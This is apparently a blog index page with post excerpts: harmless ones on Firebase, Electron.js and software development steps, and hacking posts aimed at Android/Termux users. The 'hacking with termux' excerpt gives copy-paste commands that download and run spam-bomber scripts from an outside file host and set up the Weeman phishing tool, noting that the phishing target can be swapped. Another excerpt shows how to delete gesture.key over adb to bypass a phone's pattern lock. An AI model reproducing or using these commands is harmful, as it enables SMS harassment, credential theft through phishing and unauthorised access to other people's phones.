@@ what is firebase?@@    >>>Firebase is a backend platform for building   Web, Android  and  IOS applications     It offers  real time  database, different APIs,  multiple authentication types and hosting platform                                                 .    
Posts
Showing posts from 2018
- Get link
- X
- Other Apps
 
                                   *****Electronjs****            In this article i gonna walk you through uses of electronjs,   you all know that javascript is most useful and rapidly growing language on web,   and it's very easy to adapt.   most of the people's thing javascript is only a client-side language and nothing more,    but nowadays javascript is useful in almost every field  such as in the development of web apps, desktop apps, mobile apps (Android, IOS, window)   and even in AI and machine learning   we have a couple of frameworks that makes javascript so efficient   for example   >>  Reactjs   >> angularjs   >> vuejs   and my personal favorite   >> electronjs   today I gonna walk you through about uses of electronjs and  also " how to install electronjs in your system?"   first, I will walk you through the uses of electron js in various application   of web, Android...
- Get link
- X
- Other Apps
 steps involved in software development      hello techies!!!   in our day to day  life we are using so many software,   today I gonna walk you through steps involved in the development of software or part of the software...    trust me it will help you a lot, if you are interested in programming, or wanna become a software developer     steps involved in software development      >>> communication :::>     >>>planning :::>   >>>:::> modeling:::>   >>>:::>construction:::>   >>>:::> testing:::>   >>>::: deployment and maintenance:::>   >>>::: maintaining:::>     here are a few steps I listed in the software development cycle   let me explain them one by one...     00) communication - it is the most important thing in any task ( project),   communication allows us to put our efforts together to achieve our goal.   in software development, the last member of our team should...
- Get link
- X
- Other Apps
 
   Hacking and penetration testing on android using termux app     >>> run exploits   >>> install tools   >>>git              TECH4YOU  fdSpam bom mall  $ pkg install update   $ pkg install upgrade   $ pkg install wget   $ pkg install php   $ wget http://files-store.theprivat.ml/uploads/bom-mall.zip   $ unzip bom-mall.zip   $ cd bom-mall   $ php run.php  ••••••••••••••••••••••••••••••••  (```Install``` *SpamTsel*)   $ pkg install curl   $ pkg install php    $ curl -s http://files-store.theprivat.ml/uploads/bombtsel.txt > bombtsel.php   $ chmod 777 bombtsel.php   $ php bombtsel.php  ••••••••••••••••••••••••••••••••  (```Install``` *Weeman* )    $ apt update && apt upgrade -y   $ apt install git -y    $ apt install python2 -y   $ git clone https://github.com/evait-security/weeman   $ cd weeman   $ chmod 777 weeman.py   $ python2 weeman.py    Contoh  $ set url http://facebook.com   $ set action_url http://facebook.com  run  (Bisa diganti phising nya, ...
- Get link
- X
- Other Apps
        .Bypass Android Pattern Lock from ADB Tool   how to hack android pattern lock /         You can bypass or disable your android pattern lock from usinh ADB (AndroidDebugging Bridge)Tool.You can download this tools from its official website.ADB tools work with your Window PC Linux,You can easily bypass android lockscreen from ADB Tools.   MakeSure USB Debugging is enabled in your android phone.If your Mobile USB Debugging is not enabled in your android phone,you can;tuse this method.   1.Download and Install ADB Drivers in your Window PC.   2.Connect Your Android Phone with your Window PC.   3.Open Command Prompt ,type adb devices and press enter.   4.Now you see your Device Name with its model number.   5.Type   one by one these commands in your Command Prompt Screen.👇👇👇   ▶️ adb shell   ▶️ su        ▶️ rm /data/system/gesture.key   ▶️now enter any pattern in your android phone and you can easily bypass android pattern lockscre...
 
